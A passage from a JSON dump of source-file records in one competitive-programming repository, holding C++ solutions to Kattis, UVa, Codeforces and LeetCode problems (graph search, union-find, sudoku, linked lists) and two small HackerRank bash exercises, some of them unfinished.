cin.tie(NULL);\r\n\r\n int testCase = 0;\r\n while (cin >> m) {\r\n cin >> n;\r\n openf();\r\n //cout << m << \" \" << n << endl;\r\n testCase++;\r\n cout << \"Case \" << testCase << \": \";\r\n process();\r\n cout << endl;\r\n }\r\n}"
},
{
"alpha_fraction": 0.3326381742954254,
"alphanum_fraction": 0.3555787205696106,
"avg_line_length": 20.34883689880371,
"blob_id": "8ca8912ab8dce0eeb235749d311b232fd0f172c1",
"content_id": "d437490b35ccd7896ba752c91fe0ba9fab347f61",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 959,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 43,
"path": "/katis/batmanacci.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n\r\nconst ll oo = 1e18;\r\nconst int NMAX = 1e5 + 3;\r\nll a[NMAX], k;\r\nint n;\r\n//----------------------------------------\r\nchar getResult(int n, ll k) {\r\n while (n >= 3) {\r\n if (k > a[n - 2]) {\r\n k -= a[n - 2];\r\n n -= 1;\r\n } else n -= 2;\r\n }\r\n\r\n if (n == 1) return 'N';\r\n return 'A';\r\n}\r\n//----------------------------------------\r\n\r\nvoid process() {\r\n a[1] = a[2] = 1;\r\n rep(i, 3, 1e5) {\r\n if (a[i - 1] <= oo - a[i - 2])\r\n a[i] = a[i - 2] + a[i - 1];\r\n else a[i] = oo;\r\n }\r\n\r\n cout << getResult(n, k);\r\n}\r\n//----------------------------------------\r\nint main() {\r\n // freopen(\"test.inp\", \"r\", stdin);\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n cin >> n >> k;\r\n process();\r\n}"
},
{
"alpha_fraction": 0.3692190945148468,
"alphanum_fraction": 0.3828658163547516,
"avg_line_length": 21.589284896850586,
"blob_id": "d83d1e9e967e2e33a6e411da7475aebce8698a23",
"content_id": "dcb98273cfacd7154be73525473eac5dc51c27aa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1319,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 56,
"path": "/katis/virtualfriends.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\nconst int NMAX = 1e5 + 3;\r\n\r\nmap<string, int> mapName;\r\nint n;\r\nint dj[NMAX];\r\n//----------------------------------------\r\nint getParent(int u) {\r\n return dj[u] < 0 ? u : dj[u] = getParent(dj[u]);\r\n}\r\n//----------------------------------------\r\nint unionSet(int u, int v) {\r\n if (u == v) return abs(dj[u]);\r\n\r\n if (dj[u] > dj[v]) swap(u, v);\r\n dj[u] += dj[v];\r\n dj[v] = u;\r\n\r\n return abs(dj[u]);\r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n cin >> n;\r\n string s1, s2;\r\n int cnt = 0;\r\n mapName.clear();\r\n rep(i, 1, n) { \r\n cin >> s1 >> s2;\r\n if (mapName.find(s1) == mapName.end()) {\r\n mapName[s1] = ++cnt;\r\n dj[cnt] = -1;\r\n }\r\n if (mapName.find(s2) == mapName.end()) {\r\n mapName[s2] = ++cnt;\r\n dj[cnt] = -1;\r\n }\r\n\r\n int u = getParent(mapName[s1]);\r\n int v = getParent(mapName[s2]);\r\n\r\n cout << unionSet(u, v) << endl;\r\n }\r\n}\r\n//----------------------------------------\r\nint main() {\r\n int test;\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n cin >> test;\r\n while (test--) {\r\n process();\r\n }\r\n}"
},
{
"alpha_fraction": 0.33818182349205017,
"alphanum_fraction": 0.35418182611465454,
"avg_line_length": 22.724138259887695,
"blob_id": "dfbbc3a876897d79c01f6b92dafc9d9cf6eb8e0b",
"content_id": "9e832efa1a5599d86f4373d459adb6de6840a58f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1375,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 58,
"path": "/codeforces/1510K.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\n#define rep(i, a, b, step) for (auto i = a; i <= b; i += step)\n#define repr(i, a, b, step) for (auto i = a; i >= b; i -= step)\n#define it(x, s) for (auto x:s)\n\n\nconst int NMAX = 1e3 + 3;\nvector<int> a;\nint n; \n\nvoid openf() {\n // freopen(\"test.inp\", \"r\", stdin);\n int u;\n cin >> n;\n rep(i, 1, 2 * n, 1) {\n cin >> u;\n a.push_back(u);\n }\n}\n//--------------------------------------------------\nvoid rotate(vector<int>&b, int t) {\n if (t == 0) { //xoay kieu 1\n rep(i, 0, 2 * n - 1, 2) {\n swap(b[i], b[i + 1]);\n }\n }\n else {\n swap_ranges(b.begin(), b.begin() + n, b.begin() + n);\n } \n}\n//--------------------------------------------------\nvoid process() {\n vector<int> b(a);\n vector<int> c(a);\n sort(c.begin(), c.end());\n rep(num_iter, 0, 2 * n, 1) {\n // cout << num_iter << \": \";\n // it(x, b) \n // cout << x << \" \";\n // cout << endl;\n if (c == b) {\n if (n & 1 == 1)\n cout << min(num_iter, 2 * n - num_iter);\n else \n cout << min(num_iter, 4 - num_iter);\n return;\n }\n rotate(b, num_iter & 1);\n }\n cout << -1;\n}\n//--------------------------------------------------\nint main() {\n openf();\n process();\n}"
},
{
"alpha_fraction": 0.44158416986465454,
"alphanum_fraction": 0.4554455578327179,
"avg_line_length": 19.239999771118164,
"blob_id": "abf51c9dbd7f1119cf558ff18e691bf6ac73e209",
"content_id": "858293065ae715b1e8b8d2ec5ca6ef5c95349c19",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 505,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 25,
"path": "/uva/679.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\n#define rep(i, a, b, step) for (auto i = a; i < b; i += step)\n#define repr(i, a, b, step) for (auto i = a; i > b; i -= step)\n\ntypedef pair<int, int> pii;\n\nconst int NMAX = (1 << 20) + 3;\nbitset<NMAX> bs;\n\nint main() {\n int test, D, I;\n cin >> test;\n while (test--) {\n cin >> D >> I;\n bs.reset();\n int cur = I;\n int number_of_node = 1;\n while (cur < (1 << D - 1)) {\n int pos = \n \n }\n } \n}"
},
{
"alpha_fraction": 0.47096773982048035,
"alphanum_fraction": 0.49677419662475586,
"avg_line_length": 13.090909004211426,
"blob_id": "b6fa0d9b2f6db4669d5c80efc80b0f522da3cffd",
"content_id": "cd2dbe5501f7c4e9257312d6fe035a0b05fce46a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 155,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 11,
"path": "/bash/hackerrank/average.sh",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "read number\ni=1\nsum=0\nwhile [[ $i -le $number ]]\ndo\n\tread x\n\tsum=$(( sum + x ))\n\t(( i = i + 1 ))\ndone\nres=$(bc -l <<< \"$sum / $number\")\nprintf \"%.3f\" $res\n"
},
{
"alpha_fraction": 0.3231883943080902,
"alphanum_fraction": 0.3485507369041443,
"avg_line_length": 19.59375,
"blob_id": "de362cc7d60f04226f2630c8064bbbfb6c110036",
"content_id": "0a27c6d760250f9bdc349ec16939208d179d1396",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1380,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 64,
"path": "/katis/buttonbashing.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n\r\nconst int dx[4] = {-1, 0, 1, 0};\r\nconst int dy[4] = {0, 1, 0, -1};\r\n\r\nconst int NMAX = 36e2 + 4;\r\n\r\nint n, t;\r\nint d[NMAX];\r\nint a[20];\r\nqueue<int> q;\r\n//----------------------------------------\r\nvoid openf() {\r\n cin >> n >> t;\r\n rep(i, 1, n)\r\n cin >> a[i];\r\n}\r\n//----------------------------------------\r\nvoid BFS(int root) {\r\n memset(d, 0, sizeof(d));\r\n d[root] = 1;\r\n q.push(root);\r\n\r\n while (!q.empty()) {\r\n auto u = q.front();\r\n rep(i, 1, n) {\r\n int v = min(3600, max(0, u + a[i]));\r\n if (d[v] == 0) {\r\n d[v] = d[u] + 1;\r\n q.push(v);\r\n }\r\n }\r\n q.pop();\r\n }\r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n memset(d, 0, sizeof(d));\r\n BFS(0);\r\n\r\n rep(i, t, 3600)\r\n if (d[i]) {\r\n cout << d[i] - 1 << \" \" << i - t << endl;\r\n break;\r\n }\r\n} \r\n//----------------------------------------\r\nint main() {\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n\r\n int testCase;\r\n cin >> testCase;\r\n rep(test, 1, testCase) {\r\n openf();\r\n process();\r\n }\r\n}"
},
{
"alpha_fraction": 0.4615384638309479,
"alphanum_fraction": 0.4781859815120697,
"avg_line_length": 30.10714340209961,
"blob_id": "657f2ac12df29ea2edc6405b19ff2c0ccd6badd5",
"content_id": "71dba0855e740074ecc2bc170ab208d6c7aa5fa2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1742,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 56,
"path": "/leetcode/37.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <vector>\n#include <set>\n#include <iostream>\nusing namespace std;\n\n\nclass Solution {\npublic:\n bool solved = false;\n void solveSudoku(vector<vector<char>>& board) {\n trySolveACell(board, 0, 0);\n }\n\nprivate:\n vector<pair<int, int>> get_list_relative_cell(pair<int, int> cell) {\n vector<pair<int, int>> res = {};\n for (int i = 0; i < 9; i++) {\n res.push_back(make_pair(i, cell.second));\n res.push_back(make_pair(cell.first, i));\n res.push_back(make_pair(cell.first / 3 * 3 + i / 3, cell.second / 3 * 3 + i % 3));\n }\n return res;\n }\n\n pair<int, int> getNextCell(int i, int j) {\n if (i == 8 && j == 8) return make_pair(-1 , -1);\n if (j != 8) return make_pair(i, j + 1);\n else return make_pair(i + 1, 0);\n }\n\n void trySolveACell(vector<vector<char>>& board, int i, int j) {\n if (solved) return;\n if (i == -1) {\n solved = true;\n return;\n }\n bool isSet = board[i][j] != '.';\n set<char> available_value = { '1', '2', '3', '4', '5', '6', '7', '8', '9' };\n if (!isSet) {\n for (auto p: get_list_relative_cell(make_pair(i, j))) {\n available_value.erase(board[p.first][p.second]);\n }\n } else {\n available_value = { board[i][j] };\n }\n if (available_value.size() > 0) {\n for (auto value: available_value) {\n if (solved) return;\n board[i][j] = value;\n auto nextCell = getNextCell(i, j);\n trySolveACell(board, nextCell.first, nextCell.second);\n if (!isSet && !solved) board[i][j] = '.';\n }\n }\n }\n};\n"
},
{
"alpha_fraction": 0.3178410828113556,
"alphanum_fraction": 0.34232884645462036,
"avg_line_length": 21.541175842285156,
"blob_id": "72c8616443895f0b66eb1859a99ea22d1ed62c3a",
"content_id": "4daf771beae16f93f838f5e39f3b6ea363bc0699",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2001,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 85,
"path": "/katis/coast.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n\r\nconst int dx[4] = {-1, 0, 1, 0};\r\nconst int dy[4] = {0, 1, 0, -1};\r\nconst int NMAX = 1e3 + 3;\r\n\r\nint m, n;\r\nchar a[NMAX][NMAX];\r\nbool sea[NMAX][NMAX];\r\n//----------------------------------------\r\nvoid openf() {\r\n cin >> m >> n;\r\n rep(i, 1, m) \r\n rep(j, 1, n)\r\n cin >> a[i][j];\r\n}\r\n//----------------------------------------\r\nbool inside(int u, int v) {\r\n return (u >= 1 && u <= m && v >=1 && v <= n);\r\n}\r\n//----------------------------------------\r\nvoid DFS(int u, int v) {\r\n if (sea[u][v]) return;\r\n if (a[u][v] == '1') return;\r\n sea[u][v] = 1;\r\n\r\n rep(i, 0, 3) {\r\n int du = u + dx[i];\r\n int dv = v + dy[i];\r\n if (inside(du, dv))\r\n DFS(du, dv);\r\n }\r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n rep(i, 1, m) a[i][0] = a[i][n + 1] = '0';\r\n rep(i, 1, n) a[0][i] = a[m + 1][i] = '0';\r\n\r\n rep(i, 1, m) DFS(i, 0), DFS(i, n + 1);\r\n rep(i, 1, n) DFS(0, i), DFS(m + 1, i);\r\n\r\n int res = 0;\r\n rep(u, 1, m)\r\n rep(v, 1, n) { \r\n rep(i, 1, 2) {\r\n int du = u + dx[i];\r\n int dv = v + dy[i];\r\n if (inside(du, dv))\r\n res += (sea[u][v ]!= sea[du][dv]);\r\n }\r\n if (u == 1) res += (sea[u][v] ^ 1);\r\n if (u == m) res += (sea[u][v] ^ 1);\r\n if (v == 1) res += (sea[u][v] ^ 1);\r\n if (v == n) res += (sea[u][v] ^ 1);\r\n }\r\n cout << res; \r\n\r\n\t/*rep(u, 1, m) {\r\n\t\trep(v, 1, n) \r\n\t\t\tcout << sea[u][v];\r\n\t\tcout << endl;\r\n\t}*/\r\n}\r\n//----------------------------------------\r\nint main() {\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n\r\n /*\r\n int testCase;\r\n cin >> testCase;\r\n rep(test, 1, testCase) {\r\n openf();\r\n process();\r\n } */\r\n \r\n openf();\r\n process();\r\n}\r\n"
},
{
"alpha_fraction": 0.3280116021633148,
"alphanum_fraction": 0.3671988248825073,
"avg_line_length": 24.518518447875977,
"blob_id": "6c72e0dc0e71bb7e276646805f2a831e622f3ffd",
"content_id": "c21bde226c868c6fe5512e91b2d09121830f01c0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1378,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 54,
"path": "/uva/10911.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\n#include <cmath>\n#include <iomanip>\nusing namespace std;\n\n#define rep(i, a, b, step) for (auto i = a; i <= b; i += step)\n#define repr(i, a, b, step) for (auto i = a; i >= b; i -= step)\n\nconst int NMAX = 18;\nint n, px[NMAX], py[NMAX];\ndouble f[1 << NMAX];\n\n\ndouble dis(int i, int j) {\n return sqrt(pow(px[i] - px[j], 2) + pow(py[i] - py[j], 2));\n}\n\nvoid process() {\n rep(i, 0, (1 << 2 * n) - 1, 1)\n f[i] = -1;\n f[0] = 0;\n rep(i, 0, (1 << 2 * n) - 1, 1) {\n if (f[i] == -1) continue;\n rep(j1, 0, 2 * n - 1, 1)\n rep(j2, j1 + 1, 2 * n - 1, 1) \n if (((i >> j1 & 1) == 0) && ((i >> j2 & 1) == 0)) {\n int new_i = i + (1 << j1) + (1 << j2);\n double d = f[i] + dis(j1, j2); \n if (f[new_i] == -1)\n f[new_i] = d;\n else \n f[new_i] = min(f[new_i], d);\n }\n }\n}\n\n\nint main() {\n freopen(\"test.inp\", \"r\", stdin);\n int test; \n test = 0;\n while (cin >> n) {\n if (n == 0) break;\n test += 1;\n string name;\n rep(i, 0, 2 * n - 1, 1) {\n cin >> name;\n cin >> px[i] >> py[i];\n }\n process();\n cout << fixed << setprecision(2);\n cout << \"Case \" << test << \": \" << f[(1 << 2 * n) - 1] << endl;\n }\n}\n"
},
{
"alpha_fraction": 0.35555556416511536,
"alphanum_fraction": 0.37037035822868347,
"avg_line_length": 25.03636360168457,
"blob_id": "f4bb5069c280e4db24b92e154876e25dadfd049b",
"content_id": "1c252a371f11c2de65c7df227ed57e352b0568b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1485,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 55,
"path": "/katis/kastenlauf.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n\r\nconst int NMAX = 1e2 + 5;\r\nint posx[NMAX], posy[NMAX], n, dj[NMAX];\r\n//----------------------------------------\r\nvoid openf() {\r\n cin >> n;\r\n cin >> posx[1] >> posy[1];\r\n cin >> posx[2] >> posy[2];\r\n rep(i, 1, n)\r\n cin >> posx[2 + i] >> posy[2 + i];\r\n}\r\n//----------------------------------------\r\nbool connected(int u, int v) {\r\n return (abs(posx[u] - posx[v]) + abs(posy[u] - posy[v]) <= 1000);\r\n}\r\n//----------------------------------------\r\nint findParent(int u) {\r\n return (dj[u] < 0 ? u: dj[u] = findParent(dj[u]));\r\n}\r\n//----------------------------------------\r\nvoid unionSet(int u, int v) {\r\n if (u == v) return;\r\n if (dj[u] > dj[v]) swap(u, v);\r\n dj[u] += dj[v];\r\n dj[v] = u;\r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n memset(dj, -1, sizeof(dj));\r\n rep(u, 1, n + 2)\r\n rep(v, 1, n + 2)\r\n if (connected(u, v)) {\r\n int nu = findParent(u), nv = findParent(v);\r\n unionSet(nu, nv);\r\n }\r\n\r\n if (findParent(1) == findParent(n + 2)) cout << \"happy\";\r\n else cout << \"sad\";\r\n cout << endl;\r\n}\r\n//----------------------------------------\r\nint main() {\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n int test;\r\n cin >> test;\r\n while (test--) {\r\n openf();\r\n process();\r\n }\r\n}"
},
{
"alpha_fraction": 0.36942675709724426,
"alphanum_fraction": 0.37290099263191223,
"avg_line_length": 30.018518447875977,
"blob_id": "ba34988527155161d1e5c09ac02fdcc310a9ab47",
"content_id": "097d080691f0b4ef2dbe2da8406a773225ee6133",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1727,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 54,
"path": "/katis/addingwords.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\nmap<string, int> stringToInt;\r\nmap<int, string> intToString;\r\nconst int oo = -1e9;\r\n\r\n//----------------------------------------\r\nint main() {\r\n string s, variable;\r\n int value;\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n\r\n while (cin >> s) {\r\n if (s == \"clear\") {\r\n stringToInt.clear();\r\n intToString.clear();\r\n }\r\n else if (s == \"def\") {\r\n cin >> variable >> value;\r\n if (stringToInt.find(variable) != stringToInt.end()) {\r\n intToString.erase(stringToInt[variable]);\r\n }\r\n stringToInt[variable] = value;\r\n intToString[value] = variable;\r\n }\r\n else {\r\n int temp = 0, currentSign = 1;\r\n string res = \"\";\r\n while (cin >> variable) {\r\n res += (variable + \" \");\r\n if (variable == \"+\" || variable == \"-\") { \r\n currentSign = variable == \"+\" ? 1: -1;\r\n }\r\n else if (variable == \"=\") {\r\n if (intToString.find(temp) == intToString.end())\r\n res += \"unknown\\n\";\r\n else res += intToString[temp] + \"\\n\";\r\n cout << res;\r\n break;\r\n }\r\n else {\r\n if (temp == oo) continue;\r\n if (stringToInt.find(variable) == stringToInt.end()) {\r\n temp = oo;\r\n continue;\r\n } else {\r\n temp += currentSign * stringToInt[variable];\r\n }\r\n } \r\n }\r\n }\r\n }\r\n}"
},
{
"alpha_fraction": 0.4372684061527252,
"alphanum_fraction": 0.44626787304878235,
"avg_line_length": 22.243589401245117,
"blob_id": "53054950c7c6fe362e7934b1875241f34cec934f",
"content_id": "e05d6d87fcfc92f68419369163e3e570267cb70c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1889,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 78,
"path": "/katis/torn2pieces.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n\r\nconst int dx[4] = {-1, 0, 1, 0};\r\nconst int dy[4] = {0, 1, 0, -1};\r\n\r\nint n;\r\nvector<string> pathTrace;\r\nmap<string, vector<string>> routes;\r\nset<string> setLocation;\r\nstring startLocation, finishLocation;\r\nbool ok = false;\r\n//----------------------------------------\r\nvoid openf() {\r\n string s;\r\n cin >> n;\r\n cin.ignore();\r\n rep(i, 1, n) {\r\n pathTrace.clear();\r\n getline(cin, s);\r\n string tmp = \"\";\r\n for (auto x:s) {\r\n if (x == ' ') {\r\n pathTrace.push_back(tmp);\r\n tmp = \"\";\r\n }\r\n else tmp += x;\r\n }\r\n pathTrace.push_back(tmp);\r\n rep(j, 1, pathTrace.size() - 1) {\r\n routes[pathTrace[0]].push_back(pathTrace[j]); \r\n routes[pathTrace[j]].push_back(pathTrace[0]);\r\n }\r\n }\r\n}\r\n//----------------------------------------\r\nvoid DFS(string u) {\r\n if (setLocation.find(u) != setLocation.end()) return;\r\n setLocation.insert(u);\r\n pathTrace.push_back(u);\r\n\r\n if (u == finishLocation) {\r\n ok = 1;\r\n for (auto x: pathTrace) cout << x << \" \";\r\n }\r\n\r\n for (auto v: routes[u]) DFS(v);\r\n\r\n pathTrace.pop_back();\r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n pathTrace.clear();\r\n cin >> startLocation >> finishLocation;\r\n DFS(startLocation);\r\n\r\n if (!ok) cout << \"no route found\";\r\n}\r\n//----------------------------------------\r\nint main() {\r\n freopen(\"test.inp\", \"r\", stdin);\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n\r\n /*\r\n int testCase;\r\n cin >> testCase;\r\n rep(test, 1, testCase) {\r\n openf();\r\n process();\r\n } */\r\n openf();\r\n process();\r\n}"
},
{
"alpha_fraction": 0.3076923191547394,
"alphanum_fraction": 0.36538460850715637,
"avg_line_length": 7.666666507720947,
"blob_id": "be4c9c91df28b505ce2e681b1dafb20e9daef69f",
"content_id": "e8bd94ad09c59e8dad73f55f22f8a921697cb982",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 52,
"license_type": "no_license",
"max_line_length": 13,
"num_lines": 6,
"path": "/bash/hackerrank/tr.sh",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#tr1\ntr \"()\" \"[]\"\n#tr2\ntr -d \"[a-z]\"\n#tr3\ntr -s \" \"\n"
},
{
"alpha_fraction": 0.5822784900665283,
"alphanum_fraction": 0.6202531456947327,
"avg_line_length": 17.25,
"blob_id": "871078f4c3769f88d14193712478a329c0df5012",
"content_id": "6e30301765dfe447b71705a19a7e3fbaddd65a87",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 79,
"license_type": "no_license",
"max_line_length": 25,
"num_lines": 4,
"path": "/codeforces/266466B.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\nconst int NMAX = 5e4 + 3;\r\n\r\n"
},
{
"alpha_fraction": 0.33239832520484924,
"alphanum_fraction": 0.3669939339160919,
"avg_line_length": 30.940298080444336,
"blob_id": "2fa51ff07174e921129568fba97b60e7bbfb1023",
"content_id": "e7789c109fe76a82298d469ef058d34966b132b9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2139,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 67,
"path": "/leetcode/864.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\n#define rep(i, a, b, step) for (auto i = a; i < b; i += step)\n#define repr(i, a, b, step) for (auto i = a; i > b; i -= step)\n\nconst int dx[4] = { -1, 0, 1, 0 };\nconst int dy[4] = { 0, 1, 0, -1 };\n\ntypedef pair<int, int> pii;\n\nclass Solution {\n public:\n queue<tuple<int, int, int>> q;\n int d[303][303][65];\n bool inside(int x, int y, int m, int n) {\n return (x >= 0 && x < m && y >= 0 && y < n);\n }\n int shortestPathAllKeys(vector<string>& grid) {\n auto numberOfKey = 0;\n rep(i, 0, grid.size(), 1)\n rep(j, 0, grid[i].length(), 1) \n if (grid[i][j] == '&') {\n d[i][j][0] = 1;\n q.push(make_tuple(i, j, 0));\n } else if (grid[i][j] >= 'a' && grid[i][j] <= 'f')\n numberOfKey += 1;\n \n while (!q.empty()) {\n auto u = q.front();\n q.pop();\n auto x = get<0>(u);\n auto y = get<1>(u);\n auto c = get<2>(u);\n if (c == (1 << numberOfKey) - 1)\n return d[x][y][c] - 1;\n rep(i, 0, 4, 1) {\n auto x1 = x + dx[i];\n auto y1 = y + dy[i];\n //outside the box, next item\n if (!inside(x1, y1, grid.size(), grid[0].length())) continue;\n //hit the wall, next item\n if (grid[x1][y1] == '#') continue;\n //hit the lock\n if (grid[x1][y1] >= 'A' && grid[x1][y1] <= 'F') {\n // if dont have key\n if ((c & (1 << (grid[x1][y1] - 'A'))) == 0)\n continue;\n }\n auto c1 = c;\n // ifhit the key, collect the key\n if (grid[x1][y1] >= 'a' && grid[x1][y1] <= 'f')\n c1 = c | (1 << (grid[x1][y1] - 'A'));\n\n if (d[x1][y1][c1] != 0)\n continue;\n d[x1][y1][c1] = d[x][y][c] + 1;\n q.push(make_tuple(x1, y1, c1));\n }\n }\n return -1;\n }\n};\n\nint main() {\n\n}"
},
{
"alpha_fraction": 0.4216725528240204,
"alphanum_fraction": 0.43934041261672974,
"avg_line_length": 23.285715103149414,
"blob_id": "a0d81ea00278fbb2aa9e1821ffd854f40de69c7c",
"content_id": "bffd99240747e2ac3c9883429fcb5df8e5a1b3ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 849,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 35,
"path": "/leetcode/19.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\nstruct ListNode {\n int val;\n ListNode *next;\n ListNode(): val(0), next(nullptr) {}\n ListNode(int x): val(x), next(nullptr) {}\n ListNode(int x, ListNode *next): val(x), next(next) {}\n};\n\nclass Solution {\n public:\n ListNode* removeNthFromEnd(ListNode* head, int n) {\n ListNode* p1 = head;\n ListNode* p2 = nullptr;\n int cnt{0};\n while (true) {\n \n if (cnt == n)\n p2 = head;\n if (p1 -> next == nullptr)\n break;\n cnt += 1;\n p1 = p1 -> next;\n if (p2 != nullptr)\n p2 = p2 -> next;\n }\n if (p2 != nullptr)\n p2 -> next = (p2 -> next) -> next;\n else\n head = head -> next;\n return head;\n }\n};"
},
{
"alpha_fraction": 0.4052478075027466,
"alphanum_fraction": 0.426384836435318,
"avg_line_length": 28.191490173339844,
"blob_id": "d5d54c5f56a873e91e97657e4d779296efc303f2",
"content_id": "82f77c522bdfd4136c4a2f889f09d1a9b4e856b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1372,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 47,
"path": "/leetcode/add_two_number.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\n#define rep(i, a, b, step) for (auto i = a; i < b; i += step)\n#define repr(i, a, b, step) for (auto i = a; i > b; i -= step)\n\ntypedef pair<int, int> pii;\n\nstruct ListNode {\n int val;\n ListNode *next;\n ListNode(): val(0), next(nullptr) {}\n ListNode(int x): val(x), next(nullptr) {}\n ListNode(int x, ListNode* next): val(x), next(next) {}\n};\n\nclass Solution {\n public:\n ListNode* addTwoNumbers(ListNode* l1, ListNode* l2) {\n ListNode* res = new ListNode();\n ListNode* h = res;\n int carry(0);\n while (l1 != nullptr || l2 != nullptr) {\n int val1 = l1 == nullptr ? 0 : l1 -> val; \n int val2 = l2 == nullptr ? 0 : l2 -> val;\n int temp = val1 + val2 + carry;\n carry = temp / 10;\n h -> val = temp % 10;\n h -> next = new ListNode();\n h = h -> next;\n if (l1 != nullptr) l1 = l1 -> next;\n if (l2 != nullptr) l2 = l2 -> next;\n }\n if (carry > 0)\n h -> val = carry;\n else\n h -> val = -1;\n\n h = res;\n while ((h -> next) -> val != -1) \n h = h -> next;\n h -> next = nullptr;\n return res;\n }\n};\nint main() {\n}\n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 8,
"blob_id": "75cce18ae090ffeabe251c9a4f436cf3adeea275",
"content_id": "465c78590e737e9c50b9078d2062ea8c106f9bfa",
